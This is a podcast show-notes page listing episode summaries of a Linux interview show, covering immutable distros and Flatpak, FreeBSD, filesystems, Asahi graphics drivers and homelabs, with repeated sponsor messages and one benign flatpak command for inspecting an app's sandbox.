Joe is joined by Jorge Castro to talk about distros with immutable filesystems like Fedora Silverblue, and Flatpak and Flathub.
Jorge mentioned:
Setting yourself up for success before trying Fedora Silverblue
Ideas on growing the Flathub Community in 2022
An example command for zoom which will show you what the app sees:
flatpak run –command=sh –devel us.zoom.Zoom
[This show used to be called Late Night Linux Extra. Don’t worry, the fabric of reality isn’t breaking down.]
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Adam and Neal return to talk about Google’s mysterious open source operating system Fuchsia.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Joe is joined by Chris from Linux After Dark and Fedora user Adam Dean to discuss using GNOME and why we shouldn’t bash it so often. Adam wrote a book called the Linux Administration Cookbook.
CBT Nuggets
This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Joe is joined by Allan Jude from the 2.5 Admins and BSD Now podcasts to talk about FreeBSD. Allan mentioned his company Klara.
CBT Nuggets
This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Joe is joined by Carl George, a Principal Software Engineer at Red Hat, to discuss Fedora, RHEL, CentOS Linux, and CentOS Stream.
Carl is a regular in the Linux Unplugged Mumble room. We mentioned Carl’s Twitter thread about the relationship between Fedora, RHEL, and CentOS.
CBT Nuggets
This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Joe and Alex from the Self-Hosted podcast discuss DockerSlim and Slim AI with Martin Wimpress. Martin mentioned SlimDevOps on Twitch.
CBT Nuggets
This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Joe is joined by Btrfs advocate Neal Gompa and ZFS advocate Jim Salter (from 2.5 Admins) to discuss Jim’s recent criticism of Btrfs.
CBT Nuggets
This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Joe is joined by Gary Kramlich, the Pidgin project maintainer. Gary mentioned the contributing page, and the upcoming State of the Bird event which will be streamed on his Twitch channel.
CBT Nuggets
This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Joe is joined by Alyssa Rosenzweig, a graphics developer who’s passionate about software freedom and leads the Panfrost and Asahi graphics drivers, about porting Linux to the M1 Macs.
Gary, Chris and Dalton haven’t disappeared. We’ve launched a new show called Linux After Dark.
CBT Nuggets
This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Dalton gives us his first impressions of the Framework laptop, why we didn’t talk about AMD mobile CPUs when the M1 came up, and what we do when the software we want isn’t in the main repo.
CBT Nuggets
This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Gary, Chris, Dalton, and Joe discuss reporting bugs, why we don’t always do it, and why we really should.
CBT Nuggets
This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Gary, Chris, and Joe are joined by Dalton to discuss whether platforms really matter in an age where they all offer so much choice with Virtualization, WSL, proton, and cloud desktops etc.
CBT Nuggets
This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Gary, Chris, and Joe cover some of your feedback about why we use traditional GTK desktops rather than Plasma or a tiling window manager, why we don’t use MikroTik network gear, and Joe’s “homelab”.
CBT Nuggets
This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Joe talks to Chris and Gary about their homelab setups, their use of the cloud, and how it all ties together with WireGuard.
CBT Nuggets
This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Joe is joined by Chris and Gary again to discuss cryptocurrencies, blockchain, and NFTs. Our history, our mistakes, and ultimately why we became jaded about the whole thing.
CBT Nuggets
This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Joe is joined by Chris and Gary to discuss how we got into Linux around a decade ago, and what would be different for someone getting into it these days.
CBT Nuggets
This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Joe is joined by Chris and listener Orlando to talk about why Arch and derivatives like Artix Linux are perfect for some users.
Chris mentioned a talk called The Tragedy of systemd.
CBT Nuggets
This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
In this community meetup recording, we discuss what lengths we all go to to protect our privacy.
Linode
Simplify your cloud infrastructure with Linode’s Linux virtual machines and develop, deploy, and scale your modern applications faster and more easily. Go to linode.com/latenightlinux and get started with $100 credit.
CBT Nuggets
This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
In this community meetup recording, we discuss the realities of using a FOSS-only phone.
Linode
Simplify your cloud infrastructure with Linode’s Linux virtual machines and develop, deploy, and scale your modern applications faster and more easily. Go to linode.com/latenightlinux and get started with $100 credit.
CBT Nuggets
This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
In this community meetup recording, we discuss how far we are all willing to go to support people who we switch to Linux.
Linode
Simplify your cloud infrastructure with Linode’s Linux virtual machines and develop, deploy, and scale your modern applications faster and more easily. Go to linode.com/latenightlinux and get started with $100 credit.
CBT Nuggets
This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
Joe is joined by Sean Davis to discuss the his shift from Xfce develpment towards elementary OS, and then we find out that Félim has a lot more tech superstitions than he thought. There is some bad language in this episode.
Linode
Simplify your cloud infrastructure with Linode’s Linux virtual machines and develop, deploy, and scale your modern applications faster and more easily. Go to linode.com/latenightlinux and get started with $100 credit.
CBT Nuggets
This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.
See our contact page for ways to get in touch.
See the RSS Feeds page for ways to subscribe to the show.
26.04